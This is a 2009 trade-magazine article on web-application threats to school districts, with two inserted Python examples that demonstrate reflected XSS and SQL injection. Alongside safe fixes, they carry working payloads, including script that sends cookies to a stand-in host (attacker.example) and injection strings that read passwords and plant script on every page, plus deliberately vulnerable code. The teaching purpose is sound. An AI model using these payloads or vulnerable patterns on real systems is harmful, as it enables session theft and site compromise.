IT Security: Target: The Web


No longer focused on the network, hackers have a bull's eye now trained squarely on web-based applications. What, if anything, can school districts do to thwart them?

Target: The Web

IN DECEMBER, MICROSOFT ANNOUNCED a major security flaw affecting its Internet Explorer web browser. The flaw allowed hackers to use hidden computer code they had already injected into legitimate websites to steal the passwords of visitors to those sites. Reportedly, more than 10,000 websites were infected with the destructive code by the time Microsoft came forward with the news.

The announcement grabbed big headlines, emerging as it did during the Christmas season while unsuspecting online shoppers were clicking away. As Eric Schultze, CTO of Roseville, MN-based patch-management solutions provider Shavlik Technologies, explained it, hackers were exploiting legitimate websites via SQL injection techniques. "This means that visiting supposedly safe websites can lead to compromise via this IE flaw," Schultze said at the time. "Attackers were able to exploit poor SQL coding practices on these 'legit' sites that enable hackers to inject evil code on the websites."

The fix was simple enough, and Microsoft provided a downloadable security patch in record time. Schultze described the company's reaction to the vulnerability as an "all-hands-on-deck response" that was "quite disruptive to its own processes." But the flaw gave critics of the Redmond, WA-based technology empire an excuse to engage in some full-throated Microsoft bashing.

Lost in the hubbub and faultfinding, says web-application security expert Billy Hoffman, was a larger problem.

"These kinds of exploits come and go," Hoffman says. "Next, it'll be a Firefox flaw. A couple of weeks ago it was a problem with QuickTime. At the end of the day, the interesting thing about this IE security issue is that it wasn't about somebody e-mailing you a trojaned WMF image file. Now attackers are setting bear traps on websites."

Hoffman manages HP's Web Security Research Group. Formerly a security researcher for SPI Dynamics (which HP acquired in 2007), he earned hacker street cred during his college days at Georgia Tech when he uncovered a security flaw in the school's magnetic ID card system. He later developed a suite of research tools for capturing, modifying, and validating data from magnetic stripe cards, called Stripe Snoop.

"Bad software is the root of all evil. And it's the true root of most IT security problems."

"Within a day or two, at least 6,000 websites had been hacked," Hoffman says, explaining the lethal swiftness of the IE attack. "That's an extremely fast turnaround time. Hackers were able to act that quickly because these websites had already been compromised. They had exploit kits just sitting there on the web servers, and the attackers just basically updated them to begin serving this IE exploit. It shows how automated these exploits have become." (Exploit kits are software tools that hackers create and use for computer attacks. MPack, IcePack, and Neosploit are among the best known.)

Hoffman sees the speed with which attackers exploited the IE flaw as emblematic of a frightening trend-- one that is colliding with an even scarier one: Hackers are targeting weaknesses in the application layer. And they are not planting the usual viruses or trojans that perimeter firewalls and signature-based antivirus can screen out, but are revealing an emerging species of attack growing out of the inherent nature of applications that live on the web. "Hackers have compromised hundreds of thousands of legitimate websites through web-app vulnerabilities," Hoffman says, "and they are using those compromised sites to serve malware to visitors."

This is a worrying development for educators who use online educational software and content. What can K-12 technology managers do to cope with this new line of cyber attack?

Controlling the Uncontrollable

"Unfortunately, there's really not much you can do," Hoffman says, "because attackers are starting to target sites you trust. USA Today's website was used to serve malware earlier this year. It's not like you can say, 'Don't visit sites that have URLs ending in .ua for the Ukraine.' You can get hit on legitimate sites."

There may not be much a district can do, but there is something, says Paul Myer, senior vice president of corporate development at Orange, CA-based security solutions provider Marshal8e6. (The company is a merger of the two internet security firms Marshal and 8e6 Technologies, a deal struck last November.)

Web-app vulnerabilities, Myer says, are part of the evolving landscape of threats, and cyber security evolves right along with it. A case in point he cites is Henrico County Public Schools, which found at least part of the answer in a filtering tool it employed to protect students in its 1-to-1 laptop program from inappropriate and malicious web content. In 2001, the Richmond, VA, district began distributing laptops to its teachers, staff, and secondary students. By 2007, the district had gotten laptops into the hands of approximately 27,600 middle and high school students and teachers at 66 schools.

To provide security for the program, and in particular to comply with the Children's Internet Protection Act (CIPA), which mandates that federally funded schools install internet filters to protect students from unsafe online content, the district turned to Marshal8e6. The vendor's Mobile Client program, which Henrico County deployed, is designed to prevent off-site students from accessing not only inappropriate content (pornography, hate speech, etc.) but also malicious web-based code.

"In education you have an interesting confluence of factors," says Myer. "You have curious students with lots of imagination, good equipment at their fingertips, and lots of time on their hands."

"We shouldn't use the developers as the scapegoats. Remember, they’re paid for features and speed, not security."

And they have MySpace, which hit the district's network like what Henrico County Systems Administrator Jason Cope calls an overnight explosion. Through MySpace, students have unlimited access to e-mail, instant messaging, blogs, and photo galleries. "Suddenly, everyone was trying to use [MySpace], and there was a plethora of hits to multiple points of entry for the site," Cope says.

The increased traffic degraded the district's internet access to educational applications and increased its exposure to malicious code. Henrico County eventually turned to another Marshal8e6 product, the R3000 internet filter. The standalone filtering appliance utilizes a pattern-detection capability to sort out and block three types of web applications: streaming media applications, remote access control applications, and online games.

The same strategy lies at the heart of San Ramon, CA-based Faronics' literally named filtering tool, Anti-Executable, designed specifically to shield school computers from malicious executable code. The product works from a white list, a roster of authorized programs that district tech managers and IT administrators control.

"If an executable shows up and it's not on the white list, the product keeps that code from running," explains company spokesperson Dheeraj Mahtani. "We think this approach is especially useful in K-12 environments. It ensures that students have access to the productive programs they need while preventing anything that's unwanted in the classroom from running."

Along with Anti-Executable, Faronics offers a product called Deep Freeze that allows users what you might call a do-over in the event of a strike from hackers. Upper Dauphin Area School District uses both tools to secure its students' computers.

The district comprises an elementary, middle, and high school located in Elizabethville, PA. It supports 500-plus student and teacher workstations running Microsoft Windows XP, and 19 servers. Tainted software had become an especially serious problem in the high school computing labs, according to district Technology Director Bryan Campbell. The advanced computing abilities of some ill-intentioned students allowed them to create larger workstation disruptions, Campbell says. The district's effort to "bring control to an uncontrolled environment," as he terms it, was straining its IT resources. Software that restricts what users can do and access did help the district prevent several forms of system damage-- for a while. But Campbell says this approach was difficult and time-consuming, and at the end of the day, the students were just too adept at circumventing it.

Deep Freeze is a reboot-to-restore tool that takes a snapshot of the computer and "freezes" it into a protected state. Any changes made to that snapshot can be undone by the program and the computer returned to that original frozen state.

"It's just a fact that computers in education environments are among the toughest to manage and secure," Mahtani says. "Lots of different daily users and limited on-site staff support for what are often large numbers of machines create a kind of IT perfect storm. Deep Freeze allows administrators to set up a machine and walk away. The protection takes place on the restart."

Are Programmers to Blame?

The rise of web apps as the No. 1 avenue of malicious hacker attack is old news to Gary McGraw, who has been preaching application security for years. He's the author or co-author of six bestselling books on the subject, including the now-classic Exploiting Software: How to Break Code (Addison-Wesley Professional, 2004), which he wrote with Greg Hoglund, founder of a clearinghouse website for information about rootkits and anti-rootkits. His latest book, also written with Hoglund, is Exploiting Online Games: Cheating Massively Distributed Systems (Addison-Wesley Professional, 2007). McGraw is also the CTO of Cigital, a Dulles, VA-based provider of software quality and security solutions.

Why Web Apps Are So Vulnerable

WEB APPLICATIONS HAVE BECOME RIPE for attack thanks in part, some computer security experts say, to the enormous popularity of a development technique known as Ajax, which utilizes the JavaScript dynamic scripting language.

Ajax creates highly interactive web pages through the combination of several technologies in addition to JavaScript, including XML and HTML.

And therein lies the problem, says security expert Brian Chess.

"JavaScript is very hard to secure, and nowadays it's everywhere on the web," he says. "And the fact that Ajax proponents are not acknowledging the problem isn't making it any easier. We need to stop teaching people to make use of these new web technologies while pretending that there are no security considerations. With new technologies comes a new set of threats."

Veritable throngs of web-app developers are now using Ajax to improve the responsiveness of web pages by automating the exchange of information between browsers and servers. The result has been a greatly improved user experience-- and an unexpected vulnerability. By 2006, attackers were routinely using JavaScript to exploit cross-site scripting (XSS) vulnerabilities in dynamic websites. In an XSS attack, a web application is used to deliver malicious script to an unsuspecting end user through his browser. Because the script arrives from a site the user trusts, the browser runs it with that site's privileges, giving the attacker access to cookies, session tokens, and other sensitive information. What's the consequence for the website visitor? Theft of data, mainly. And there will be no hint of trouble, so he won't know he's been compromised.
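The mechanism described above, as an added example that is not from the article or any product it mentions: a hypothetical search page echoes the visitor's search term back into the HTML. Three renderers are compared: one that echoes the raw term, one that applies the common half-fix of stripping only script tags, and one that HTML-encodes output for the context it lands in. A small detector built on Python's own HTML tokenizer then checks whether each rendered page would execute script the way a browser would parse it. The two payloads and the host attacker.example are constructed for the example.

```python
import html
import re
from html.parser import HTMLParser

# Constructed attacker inputs (not from the article; attacker.example is a
# placeholder host). Each is what a visitor's browser would receive if the
# site echoed a search term back into the page unencoded.
SCRIPT_PAYLOAD = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'
EVENT_PAYLOAD = '<img src=x onerror="new Image().src=\'http://attacker.example/?c=\'+document.cookie">'

# Hypothetical search page: the term lands in a text node and in an attribute.
TEMPLATE = """<html><body>
<h1>Search results</h1>
<p>You searched for: {term}</p>
<input name="q" value="{term}">
</body></html>"""


def render_vulnerable(term: str) -> str:
    """Echoes the raw term into the page: a reflected XSS hole."""
    return TEMPLATE.format(term=term)


def render_denylist(term: str) -> str:
    """A common half-fix: strip <script> tags and nothing else. Denylists miss
    the other ways to run script (event handlers, javascript: URLs, SVG, ...),
    so this stops only the naive payload."""
    cleaned = re.sub(r"</?script[^>]*>", "", term, flags=re.IGNORECASE)
    return TEMPLATE.format(term=cleaned)


def render_safe(term: str) -> str:
    """Output encoding for the HTML context: <, >, &, and both quote characters
    become entities, so the browser sees text, not markup."""
    return TEMPLATE.format(term=html.escape(term, quote=True))


class ActiveContentDetector(HTMLParser):
    """Tokenizes the rendered page the way a browser would and records whether
    anything in it would execute: a <script> element, an on* event-handler
    attribute, or a javascript: URL."""

    def __init__(self) -> None:
        super().__init__()
        self.executes_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.executes_script = True
        for name, value in attrs:
            if name.startswith("on") or (value or "").strip().lower().startswith("javascript:"):
                self.executes_script = True


def executes_script(page: str) -> bool:
    """True if the page, as a browser would parse it, runs attacker script."""
    detector = ActiveContentDetector()
    detector.feed(page)
    detector.close()
    return detector.executes_script


if __name__ == "__main__":
    for payload in (SCRIPT_PAYLOAD, EVENT_PAYLOAD):
        for renderer in (render_vulnerable, render_denylist, render_safe):
            page = renderer(payload)
            print(f"{renderer.__name__:18} {payload[:18]!r:22} executes={executes_script(page)}")
```

The point of the denylist case is that the stripped page still runs the second payload, because nothing in it is spelled "script". Encoding on output, chosen per context (HTML body, attribute, URL, JavaScript string), is the fix; a filter on input is not.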

According to Wikipedia, as of 2007, cross-site scripting carried out on websites made up about 80 percent of all documented security vulnerabilities.

"Bad software is the root of all evil," McGraw says. "And it's the true root of most IT security problems." These days, he explains, the black hats aren't getting at you by breaching some network security mechanism, but by leveraging the functionality of an application.

"For many years, security was about operations-- about infrastructure and the people who keep the network going," McGraw says. "Today the problem is about the vulnerable software the operations managers have to deal with. They get this broken stuff, and they know it's broken, but they don't know how to fix it because they're not software guys, so they just put something around it, like an application firewall, or maybe they poke it a couple times to see how broken it really is with some black-box testing tools. Unfortunately, operations cannot solve this problem. The only people who can solve it are the software builders of the world."

Brian Chess, chief scientist and co-founder of Fortify Software, a Palo Alto, CA-based provider of enterprise application security solutions, agrees. "Whether they know it or not, computer security is largely in the hands of programmers," he says. Chess is the co-author of Secure Programming With Static Analysis (Addison-Wesley Professional, 2007), which he wrote with Jacob West, and his work at the University of California, Santa Cruz led to the development of Eau Claire, a framework for detecting and eliminating security vulnerabilities in software.

"One of our problems with security these days is that it's just too darned hard," Chess says. "It's very difficult to write a program that's secure. We're all about helping developers get it right the first time, but it's a big challenge for everyone. If there were some easy, take-a-pill kind of solution to the software security problem, you'd better believe everyone would be doing it."

Many application-layer attacks are aimed at certain well known but unfortunately still common types of coding errors pertaining to the way web applications process input from website visitors, HP's Hoffman explains. "A simple e-commerce application typically asks users for various kinds of information-- passwords, addresses, etc.-- and without the appropriate safeguards, hackers can try to use those input fields to pass malicious instructions to the host computer."
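Hoffman's point about input fields, and the mass SQL injection that seeded legitimate sites with script in the IE incident described at the top of the article, as an added example that is not from the article or any product it mentions. A hypothetical school-portal database is built in memory with made-up rows; a search box and an "edit my post" form are each written twice, once by pasting the visitor's input into the SQL string and once with bound parameters. The first payload reads the users table through the search box; the second turns an edit of one post into an edit of every post on the site, leaving each page carrying a script tag that points at attacker.example, a placeholder host.

```python
import sqlite3

# Constructed attacker inputs (not from the article; attacker.example is a
# placeholder host). The first reads data it should not see; the second
# rewrites every page on the site, which is the mass-injection pattern
# behind the drive-by campaigns the article describes.
UNION_PAYLOAD = "' UNION SELECT username, password FROM users WHERE '%' = '"
WHERE_PAYLOAD = "3' OR 1=1 OR '1'='1"
ATTACKER_SCRIPT = '<script src="http://attacker.example/ie.js"></script>'


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for a small portal database; the rows are made up."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        CREATE TABLE posts (id INTEGER PRIMARY KEY, owner TEXT, title TEXT, body TEXT);
        INSERT INTO users VALUES ('admin', 'hunter2'), ('teacher1', 'apples');
        INSERT INTO posts (owner, title, body) VALUES
            ('admin',    'Welcome',  'Welcome to the portal.'),
            ('teacher1', 'Homework', 'Chapter 3 due Friday.'),
            ('mallory',  'Hi',       'hello');
    """)
    return conn


def search_vulnerable(conn, term):
    """Builds the query by string concatenation: the visitor's input becomes SQL."""
    sql = f"SELECT title, body FROM posts WHERE title LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Parameterized query: the input is bound as a value and cannot change the statement."""
    return conn.execute(
        "SELECT title, body FROM posts WHERE title LIKE ?", (f"%{term}%",)
    ).fetchall()


def edit_post_vulnerable(conn, user, post_id, body):
    """'Edit my post' with the id pasted into the WHERE clause. Returns rows changed."""
    sql = f"UPDATE posts SET body = '{body}' WHERE id = '{post_id}' AND owner = '{user}'"
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def edit_post_safe(conn, user, post_id, body):
    """Same feature with bound parameters; an injected id simply matches nothing."""
    cur = conn.execute(
        "UPDATE posts SET body = ? WHERE id = ? AND owner = ?", (body, post_id, user)
    )
    conn.commit()
    return cur.rowcount


def infected_pages(conn):
    """Titles of posts whose body now carries a script tag, i.e. pages that would serve the exploit."""
    rows = conn.execute("SELECT title FROM posts WHERE body LIKE '%<script%'")
    return sorted(title for (title,) in rows)


if __name__ == "__main__":
    conn = build_db()
    print("vulnerable search leaks:  ", search_vulnerable(conn, UNION_PAYLOAD))
    print("safe search returns:      ", search_safe(conn, UNION_PAYLOAD))
    print("safe edit changed rows:   ", edit_post_safe(conn, "mallory", WHERE_PAYLOAD, ATTACKER_SCRIPT))
    print("vuln edit changed rows:   ", edit_post_vulnerable(conn, "mallory", WHERE_PAYLOAD, ATTACKER_SCRIPT))
    print("pages now serving script: ", infected_pages(conn))
```

Once the vulnerable edit has run, every visitor to any page on the site fetches the attacker's script, which is exactly the position the compromised "legit" sites were in. The parameterized versions treat the same strings as data: the UNION payload finds no post with that title, and the OR payload updates zero rows.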

In their latest quarterly report, security analysts at Santa Clara, CA-based Cenzic Intelligent Analysis Lab stated that SQL injection (34 percent) and cross-site scripting (23 percent) are the two most common classes of vulnerability hackers use to poison web-based applications with malicious code. The study also found that vulnerabilities in media players are opening a widening security hole that school districts need to be aware of, given the role media players have in presenting online educational content. These programs account for between 2 and 5 percent of the total web-application vulnerability volume in any given quarter, Cenzic reports; web servers account for 7 percent of the total and web browsers for 4 percent. Within the browser share, it wasn't Internet Explorer that had the most reported vulnerabilities but Mozilla's Firefox, which led by far at 41 percent. The Opera browser was second at 26 percent, and IE accounted for just 17 percent. Apple's Safari had the smallest share of reported browser vulnerabilities at 16 percent.

Security consultant and trainer Dinis Cruz recognizes the soft spot in the application layer, but he stops short of putting the onus on the developers. Cruz, who specializes in web application security, is the chief security evangelist of the Open Web Application Security Project, an open web-based community focused on finding and fighting the causes of insecure software.

"We're in the process of building a world in which all the code we run on our websites has the power to access all of our assets from our desktops and servers," Cruz says. "From a security point of view, this is a very bad development. But we shouldn't use the developers as the scapegoats. They often simply don't have enough visibility into what they are creating to evaluate the security of an application. And remember, they're paid for features and speed, not security."

"I don't want to blame the developers either," Chess adds. "There isn't a great roadmap through Web 2.0 territory, so there's this temptation to pretend that you can take care of the security part later. But if there's one thing history tells us, it's that that kind of thinking can really get us into trouble."

Cruz is especially worried about the new web-app frameworks-- such as Adobe's AIR (Adobe Integrated Runtime), Sun's JavaFX, and Microsoft's Silverlight. "The feeling now is, hey, the new paradigm is just the desktop application," he says. "The user installs it and clicks yes, so the vendor is covered, but then those things have access to all the user's resources."

"Ultimately, it's the developer who has to fix this," HP's Hoffman says. "The IT security guys are doing their job. They set up firewall rules, secure the perimeter, and implement anti-spam and antivirus protection. But they're just securing the infrastructure that's serving you an application. If that application is broken, old, or insecure in some way, there's no magical box that your IT guy can [install] to protect you.

"This is the world we now live in," Hoffman goes on. "Attackers are using web-app vulnerabilities to compromise sites, and then use those sites to lay land mines or bear traps to nail unsuspecting people coming by. There's always going to be this game of Whack-a-Mole around IE exploits-- or QuickTime or Firefox or Flash. But if we can secure these applications-- these online services that everyone uses and trusts-- there won't be any platforms for people to get attacked from."


John K. Waters is a freelance writer based in Palo Alto, CA.

This article originally appeared in the 02/01/2009 issue of THE Journal.